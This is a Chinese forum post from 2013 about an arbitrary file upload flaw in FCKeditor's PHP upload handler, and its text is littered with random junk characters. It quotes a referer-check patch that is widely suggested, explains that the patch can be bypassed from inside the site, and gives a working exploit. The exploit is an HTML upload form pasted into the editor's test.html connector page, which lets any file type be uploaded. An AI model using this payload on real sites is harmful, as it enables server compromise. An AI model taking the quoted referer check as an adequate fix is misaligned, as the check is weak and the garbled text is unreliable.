漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php+ Z" ^' z0 r Z7 H. [- I( X
网上给出的修复方案是4 I- _# R+ _0 U
修复方法,删除FCK编辑器用其他的编辑器0 c2 V4 @ q/ X% y. b
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
T" W) S) P4 Y' p6 X5 @3 F在2 c5 z7 r) m1 v3 ?
require(‘config.php’);
* c+ U* ?, D ~6 `. Srequire(‘util.php’);" T7 f* X/ o" h" q
的下面添加以下代码—————————–8 [) w- S, b) u1 @
//防止外部提交) J* v2 A p6 ?) Y* H4 m
function outsidepost()
- Y0 j s K. h7 Y1 i( p# S{
- q* `9 Z2 }1 H+ I9 m7 |$servername=$_SERVER['SERVER_NAME'];
. M* ? I% s) \; F6 d$sub_from=@$_SERVER['HTTP_REFERER'];
4 Z4 |% I4 h/ w$sub_len=strlen($servername);. _2 L/ n% I0 r/ X% K$ E
$checkfrom=substr($sub_from,7,$sub_len);
- a( J- h0 C% s9 Qif($checkfrom!=$servername){
4 F+ w* d' ~# l/ s! v. h! G' ?echo(“you don’t outsidepost!”);
4 s3 R7 H7 r* y+ W8 b( d1 Texit;
- v8 r' N/ j3 Z- d- _}; P4 F6 q( b, J9 y
}# m, \4 [% Q4 V% m. x- w
outsidepost();; p4 \* m7 F D7 K6 A5 p8 U
防止外部提交,但是没有防止内部提交,
7 P0 o: [6 W9 c* R9 h利用方法:1 R2 f- h9 b, ]+ p
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html& j. r2 q2 _0 u4 z; h) @
2,在Current Folder 框输入) H5 h$ P5 J' R. f3 D
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>5 k6 X% [) ?; u& a" u, b, ~5 l8 q4 G
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
# t: P1 `# P$ i' ~8 e) ~PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对